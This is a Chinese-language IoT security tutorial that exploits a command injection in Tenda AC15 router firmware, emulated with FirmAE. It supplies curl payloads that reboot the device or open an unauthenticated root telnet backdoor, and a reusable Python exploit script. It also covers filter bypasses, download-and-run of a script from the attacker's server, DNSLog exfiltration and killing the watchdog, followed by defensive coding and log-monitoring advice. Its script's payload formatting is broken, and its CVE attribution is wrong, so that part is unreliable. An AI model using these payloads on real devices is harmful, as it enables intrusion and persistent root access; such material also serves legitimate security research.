介绍物联网设备 Web 管理接口中的命令注入漏洞原理及挖掘实战。通过 FirmAE 模拟 Tenda AC15 固件环境,演示了漏洞定位、Payload 构造及 Root 权限获取过程,并提供 Python 自动化利用脚本。同时阐述了防御方案,包括输入验证、参数化执行及最小权限原则,适用于 IoT 安全审计与渗透测试。
在物联网(IoT)设备的攻击面中,Web 管理接口是最常见、最脆弱的入口之一。几乎所有路由器、摄像头、智能家居网关等设备都提供一个基于 Web 的图形化界面,用于配置和管理。这个接口直接暴露在网络中,其安全性直接决定了整个设备甚至整个内部网络的安危。在整个攻防体系中,针对 Web 管理接口的攻击,是获取设备控制权最高效的路径之一。
本技术广泛应用于以下实际工作场景:
物联网设备 Web 管理接口是指嵌入在设备固件中的一个微型 Web 服务器(如 httpd、lighttpd、goahead 等),它通过 HTTP/S 协议提供一个图形化网页,允许用户通过浏览器配置设备的网络设置、系统功能、查看状态等。
命令注入漏洞 (Command Injection) 是一种安全缺陷,当 Web 应用程序需要调用操作系统命令来执行某些功能时,如果未能正确过滤或净化用户输入的数据,攻击者便可以将恶意的系统命令'注入'到正常的命令执行流中,从而让设备以 Web 服务进程的权限(通常是 root 权限)执行任意代码。
想象一下你去一家智能餐厅点餐。你通过一个触摸屏(Web 管理接口)点了一份'宫保鸡丁'。
gongbaojiding; rm -f all_bills.txt)。在这个类比中,你的恶意输入'污染'了正常的指令,导致了意料之外的严重后果。
在 IoT 设备中,Web 管理接口经常使用系统命令来完成一些'接地气'的功能,例如:
ping 或 traceroute 功能,让用户测试网络连通性。reboot 命令重启设备。mtd write 等命令刷写新固件。这些功能点都是命令注入漏洞的高发区。一旦利用成功,攻击者可以直接获得设备的最高控制权限。
命令注入的本质是数据与代码的混淆。Web 应用程序将用户提供的数据(Data),不加处理地拼接到了将要执行的**代码(Code)**字符串中。操作系统在解析这条拼接后的命令时,无法区分哪些是原始指令,哪些是攻击者注入的恶意指令,从而导致了代码执行。
以下是一段存在漏洞的 PHP 伪代码,用于演示 ping 功能的实现:
<?php
// 从前端获取要 ping 的 IP 地址
$ip_address = $_GET['ip'];
// 直接将用户输入拼接到系统命令中
// 这是漏洞的根源!
$command = "ping -c 4 " . $ip_address;
// 执行命令并返回结果
system($command);
?>
如果用户输入 8.8.8.8,执行的命令是 ping -c 4 8.8.8.8,一切正常。
但如果攻击者输入 8.8.8.8; reboot,那么在 Linux/Unix 系统中,分号(;)是命令分隔符。实际执行的命令就变成了两条:
ping -c 4 8.8.8.8reboot设备会立即重启,这就是一次成功的命令注入攻击。
为了复现和挖掘 IoT 固件漏洞,我们需要模拟一个真实的设备环境。最有效的方法是使用固件模拟技术,它可以在我们的 PC 上运行 IoT 设备的操作系统和应用程序。
FirmAE 是目前最先进、成功率最高的自动化固件模拟与分析工具。它基于 QEMU,并集成了复杂的内核模块和驱动修复技术,能够模拟大量不同架构(ARM, MIPS)的固件。
核心配置命令:FirmAE 的安装脚本会自动处理所有依赖。
# 进入 FirmAE 目录
cd FirmAE
# 运行安装脚本,它会自动安装 qemu、binwalk、PostgreSQL 等所有依赖
./install.sh
安装过程可能需要 10-30 分钟,请保持网络通畅。
下载方式:通过 Git 克隆官方仓库。
# 警告:以下操作将在您的系统中安装多个依赖包。
# 建议在虚拟机或专用的 Ubuntu 系统中执行。
git clone --recursive https://github.com/pr0v3rbs/FirmAE.git
我们将使用 Tenda AC15 路由器的一个已知存在命令注入漏洞的固件版本作为目标。
下载方式:
# 在 FirmAE 目录下创建一个名为 firmwares 的文件夹
mkdir firmwares
cd firmwares
# 下载目标固件
wget https://down.tenda.com.cn/uploadfile/AC15/US_AC15V1.0BR_V15.03.05.19_multi_TD01.zip
# 解压
unzip US_AC15V1.0BR_V15.03.05.19_multi_TD01.zip
解压后,你会得到一个名为 US_AC15V1.0BR_V15.03.05.19_multi_TD01.bin 的固件文件。
使用 FirmAE 的 run.sh 脚本来启动固件模拟。
./run.sh [-c] <brand> <firmware_path>后续运行(直接启动): 分析成功后,FirmAE 会生成一个 ID。下次可以直接用 ID 启动,速度更快。
# 假设分析后生成的 ID 为 1
./run.sh -r Tenda -i1
首次运行(分析与模拟):
# 回到 FirmAE 根目录
cd ..
# 运行 FirmAE 进行分析和模拟
# -c 参数表示如果之前分析过,则清除缓存重新分析
# Tenda 是品牌名
# firmwares/US_AC15V1.0BR_V15.03.05.19_multi_TD01.bin 是固件路径
./run.sh -c Tenda firmwares/US_AC15V1.0BR_V15.03.05.19_multi_TD01.bin
FirmAE 会开始分析固件(解包、识别架构、网络配置等),然后启动 QEMU 虚拟机。当看到类似 [+] VM is running. Here is the network configuration: 的输出时,表示模拟成功。记下输出中的IP 地址,例如 192.168.0.1,这就是模拟设备的 Web 管理接口地址。
现在,打开你的浏览器,访问 http://<模拟设备的 IP 地址>(例如 http://192.168.0.1),你应该能看到 Tenda 路由器的登录界面。我们的实验环境已准备就绪。
formSetSysTime 命令注入漏洞我们将通过一个完整的流程,实战挖掘 Tenda AC15 固件中的一个真实命令注入漏洞。
步骤 1:寻找危险功能点 在 Web 管理界面中,寻找那些可能与操作系统交互的功能。我们注意到'系统管理' -> '时间设置'中有一个 NTP 服务器设置功能。用户可以指定一个 NTP 服务器地址,设备会去同步时间。这通常会涉及到网络请求或系统命令调用,是一个可疑点。
步骤 2:抓取 HTTP 请求
打开浏览器的开发者工具(F12),切换到'网络 (Network)'标签。在时间设置页面,随便输入一个 NTP 服务器地址(如 pool.ntp.org),然后点击保存。
我们会抓到一个类似下面的 HTTP POST 请求:
http://192.168.0.1/goform/formSetSysTimePOSTtimeType=ntp&ntpServer=pool.ntp.org步骤 3:固件逆向分析(可选但推荐)
为了确认后端逻辑,我们需要在解压后的固件文件系统中找到处理这个请求的程序。FirmAE 解压的文件系统通常在 scratch/<ID>/image/ 目录下。
通过 grep 命令在文件系统中搜索 URL 关键字 formSetSysTime:
# 假设 FirmAE 的 ID 为 1
grep -r "formSetSysTime" ./scratch/1/image/
搜索结果会指向 /webroot/goform/formSetSysTime,并最终定位到一个名为 httpd 的二进制文件。使用 IDA Pro 或 Ghidra 等逆向工具分析 httpd 文件,找到处理 formSetSysTime 请求的函数。
在函数中,我们会发现类似下面的 C 代码逻辑:
// 从 POST 请求中获取 ntpServer 参数的值
ntpServer = websGetVar(request, "ntpServer", "");
// 将 ntpServer 的值拼接到一个字符串中
sprintf(command, "ntpclient -h %s -s", ntpServer);
// 使用 doSystem 函数执行该命令
doSystem(command);
代码逻辑清晰地显示,ntpServer 参数被直接拼接到了 ntpclient 命令中,没有进行任何过滤或转义。这就是命令注入漏洞的根本原因。
步骤 4:构造初步 Payload
我们可以在 ntpServer 参数中注入命令。一个经典的测试 Payload 是使用反引号(`)或 $()。在 Linux 中,被反引号包裹的内容会作为命令执行,其输出会成为原始命令的一部分。
$(reboot)timeType=ntp&ntpServer=$(reboot)步骤 5:发送恶意请求
我们可以使用 curl 工具来发送这个构造好的 POST 请求。
# 警告:此命令将导致模拟的 IoT 设备重启。
# 仅限在已授权的测试环境(如 FirmAE)中执行。
curl -X POST \
-d 'timeType=ntp&ntpServer=$(reboot)' \
http://192.168.0.1/goform/formSetSysTime
请求/响应/输出结果:
ping 192.168.0.1 会发现网络不通。这证明 reboot 命令已成功执行。请求 (Request):
POST /goform/formSetSysTime HTTP/1.1
Host: 192.168.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
timeType=ntp&ntpServer=$(reboot)
步骤 6:获取反弹 Shell 重启设备只是证明了漏洞存在。真正的目标是获取一个交互式的Shell。我们可以通过注入一个反弹 Shell 的命令来实现。
$(/bin/busybox telnetd -l /bin/sh -p 1234)
busybox 工具开启一个 telnet 服务,监听在 1234 端口。-l /bin/sh 参数指定当有人连接上来时,给他一个 shell (/bin/sh)。输出结果:
Trying 192.168.0.1... Connected to 192.168.0.1. Escape character is '^]'.
#
id
uid=0(root) gid=0(root)
#
uname -a
Linux (none) 4.4.16 #1 Mon Jan 1 02:30:48 2000 armv7l GNU/Linux
#
当你看到 # 提示符并执行 id 命令返回 uid=0(root) 时,恭喜你,已经成功获取了设备的 root 权限!这就是一个完整的命令注入漏洞利用实战。
连接 Shell:
命令发送成功后,立即在你的攻击机上使用 telnet 连接模拟设备的 1234 端口。
telnet 192.168.0.1 1234
构造并发送请求:
# 警告:此命令将在模拟设备上开启一个无需密码的后门。
# 仅限在已授权的测试环境中执行。
curl -X POST \
-d 'timeType=ntp&ntpServer=$(/bin/busybox telnetd -l /bin/sh -p 1234)' \
http://192.168.0.1/goform/formSetSysTime
在实战中,手动测试效率低下。下面是一个使用 Python 编写的自动化攻击脚本,它封装了上述攻击流程,并增加了错误处理和参数化。
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests
import sys
import argparse
# 警告:本脚本仅用于经授权的渗透测试和安全研究。
# 未经授权的攻击是非法行为。使用者需自行承担所有法律责任。
# WARNING: This script is for authorized penetration testing and security research only.
# Unauthorized attacks are illegal. The user assumes all legal responsibilities.
def check_vulnerability(target_ip: str, command: str) -> bool:
"""
发送带有命令注入 payload 的请求来测试漏洞。
:param target_ip: 目标设备的 IP 地址。
:param command: 需要注入并执行的命令。
:return: 如果请求成功发送则返回 True,否则返回 False。
"""
target_url = f"http://{target_ip}/goform/formSetSysTime"
# 构造 payload,使用 $(command) 格式
payload = f"${{{command}}}"
data = {"timeType": "ntp", "ntpServer": payload}
print(f"[*] 目标 URL: {target_url}")
print(f"[*] 注入的命令:{command}")
print(f"[*] 发送的 POST 数据:{data}")
try:
# 设置一个较短的超时,因为我们不关心响应内容
response = requests.post(target_url, data=data, timeout=5)
print(f"[+] 请求已发送,状态码:{response.status_code}")
# 在这种特定情况下,即使成功,服务器也可能没有正常响应或直接崩溃
# 所以我们主要依赖命令是否实际执行来判断成功与否
return True
except requests.exceptions.Timeout:
print("[+] 请求超时。这可能意味着命令正在执行(例如重启),攻击可能已成功!")
return True
except requests.exceptions.RequestException as e:
print(f"[-] 请求失败:{e}")
return False
def main():
""" 主函数,解析命令行参数并执行攻击。 """
parser = argparse.ArgumentParser(description="Tenda AC15 formSetSysTime 命令注入漏洞 (CVE-2018-5767) 利用脚本")
parser.add_argument("target_ip", help="目标路由器的 IP 地址 (例如:192.168.0.1)")
parser.add_argument("command", help="希望在目标设备上执行的命令 (例如:'reboot' 或 '/bin/busybox telnetd -l /bin/sh -p 1234')")
# 参数合法性检查
if len(sys.argv) < 3:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
print("--- [ Tenda AC15 命令注入利用程序 ] ---")
print("--- [ 仅限授权测试环境使用 ] ---")
if check_vulnerability(args.target_ip, args.command):
print("\n[*] 攻击载荷已发送。")
if "telnetd" in args.command:
print(f"[*] 请尝试手动连接后门:telnet {args.target_ip} <port>")
elif "reboot" in args.command:
print(f"[*] 设备可能正在重启。请尝试 ping {args.target_ip} 进行确认。")
else:
print("\n[-] 攻击失败。目标可能不存在漏洞或无法访问。")
if __name__ == "__main__":
main()
使用方法:
exploit.py。执行重启命令:
python3 exploit.py 192.168.0.1 "reboot"
执行反弹 Shell 命令:
python3 exploit.py 192.168.0.1 "/bin/busybox telnetd -l /bin/sh -p 1234"
这个脚本展示了如何将手动发现的漏洞转化为一个可复用、参数化的攻击工具。
reboot)没有执行,Web 界面返回错误或无变化。;)、管道符 (|) 等特殊字符。${IFS}(Internal Field Separator)变量代替空格。例如,ls -l 变为 ls${IFS}-l。base64 编码 payload,在目标上解码执行。例如:echo "cmVib290" | base64 -d | sh。cmVib290 是 reboot 的 base64 编码。&&、||、换行符 (\n,URL 编码为 %0a) 都可以作为命令分隔符。ls 查看文件列表)。stdout 或 stderr 返回给 HTTP 响应。ls / > /tmp/listing.txt; /bin/busybox wget http://<你的 IP>/cat /tmp/listing.txt。这会让设备访问一个 URL,文件名就是 ls 的结果。ping $(ls|tr '\n' '-').your.dnslog.com。在 DNSLog 平台查看子域名访问记录,就能看到目录列表。wget 或 curl 下载执行:如果注入的命令太长,可能会被 Web 服务器的缓冲区限制。可以先注入一个短命令,从你的服务器下载一个更复杂的脚本来执行。
$(wget http://<你的 IP>/payload.sh -O /tmp/p.sh; sh /tmp/p.sh)busybox 几乎是所有 IoT 设备标配,优先使用 busybox 内置的命令(如 busybox wget, busybox telnetd)可以提高 payload 的通用性。kill 命令杀掉看门狗进程,防止意外重启。下面是使用 Mermaid 绘制的命令注入攻击时序图,清晰地展示了各个组件的交互流程。
sequenceDiagram
participant Attacker
participant Browser
participant Server
participant OS
Attacker->>Browser: Craft malicious input (reboot)
Browser->>Server: POST ntpServer=injected_value
Server->>Server: Read parameter ntpServer
Server->>OS: Execute ntpclient with injected argument
OS->>OS: Run first command ntpclient
OS->>OS: Run second command reboot
OS-->>Server: Process may terminate
Server-->>Browser: Timeout or no response
Browser-->>Attacker: Show error
OS-->>Attacker: Verify reboot
这张图直观地展示了从攻击者构造输入到操作系统最终执行恶意命令的全过程。
安全的核心是攻防一体。了解如何攻击,是为了更好地防御。
mtd 命令)可能导致设备'变砖',即永久性损坏。防御命令注入的核心原则是:永远不要信任用户的输入,并坚持数据与代码分离。
输入验证与净化 (白名单):
如果无法使用 exec 族函数,退而求其次的方案是严格的输入验证。
#include<stdbool.h>
#include<string.h>
#include<ctype.h>
// 检查字符串是否只包含合法字符(字母、数字、点、短横线)
bool is_valid_hostname(const char* host){
for(int i = 0; host[i]!='\0'; i++){
if(!isalnum(host[i]) && host[i]!='.' && host[i]!='-'){
return false; // 发现非法字符
}
}
return true;
}
char* ntp_server = get_user_input("ntpServer");
if(is_valid_hostname(ntp_server)){
// 验证通过后,再拼接执行
// ...
} else {
// 记录日志,返回错误
}
正确写法 (参数化执行):
使用 exec 族函数(如 execl, execve),将命令和参数作为独立的数组元素传递给操作系统。这样,用户的输入永远被当作一个完整的参数,而不会被解析为多条命令。
#include<unistd.h>
char* ntp_server = get_user_input("ntpServer");
// 参数列表
char* args[] = {
"/usr/sbin/ntpclient", // 命令本身
"-h", // 参数 1
ntp_server, // 参数 2 (用户输入)
"-s", // 参数 3
NULL // 数组结束符
};
// 使用 execve 执行,用户的输入只会被当作 ntp_server 的主机名
// 即使输入是 "a; reboot",也会被当作一个无效的主机名,而不会执行 reboot
execve("/usr/sbin/ntpclient", args, NULL);
错误写法 (直接拼接):
char command[256];
char* ntp_server = get_user_input("ntpServer");
sprintf(command, "ntpclient -h %s -s", ntp_server); // 危险!
system(command);
root 权限运行 Web 服务。创建一个专用的低权限用户(如 www-data)来运行 httpd 进程。这样即使发生命令注入,攻击者也只能获得一个受限的 shell,破坏力大大降低。telnetd 等不安全的服务。Web 接口本身也应可以被用户选择关闭。作为防御方,可以通过分析设备日志来发现攻击行为。
access.log): 检查 POST 请求的 body 部分,如果包含 reboot, wget, telnetd, sh 等关键字,或 ;, |, `, $() 等特殊字符,则有可能是攻击。syslog):
httpd)产生的异常子进程,例如 httpd 启动了 sh 或 telnetd。wget 下载)。ntpclient 等工具的执行日志,如果其参数包含异常字符,应立即告警。execve)替代命令拼接,并遵循最小权限原则,避免使用 root 权限运行 Web 服务。radare2、angr 等工具进行二进制文件的静态/动态分析,自动化地寻找危险函数(如 system)到用户输入的完整数据流路径。
微信公众号「极客日志」,在微信中扫描左侧二维码关注。展示文案:极客日志 zeeklog
解析常见 curl 参数并生成 fetch、axios、PHP curl 或 Python requests 示例代码。 在线工具,curl 转代码在线工具,online
将字符串编码和解码为其 Base64 格式表示形式即可。 在线工具,Base64 字符串编码/解码在线工具,online
将字符串、文件或图像转换为其 Base64 表示形式。 在线工具,Base64 文件转换器在线工具,online
将 Markdown(GFM)转为 HTML 片段,浏览器内 marked 解析;与 HTML 转 Markdown 互为补充。 在线工具,Markdown 转 HTML在线工具,online
将 HTML 片段转为 GitHub Flavored Markdown,支持标题、列表、链接、代码块与表格等;浏览器内处理,可链接预填。 在线工具,HTML 转 Markdown在线工具,online
通过删除不必要的空白来缩小和压缩JSON。 在线工具,JSON 压缩在线工具,online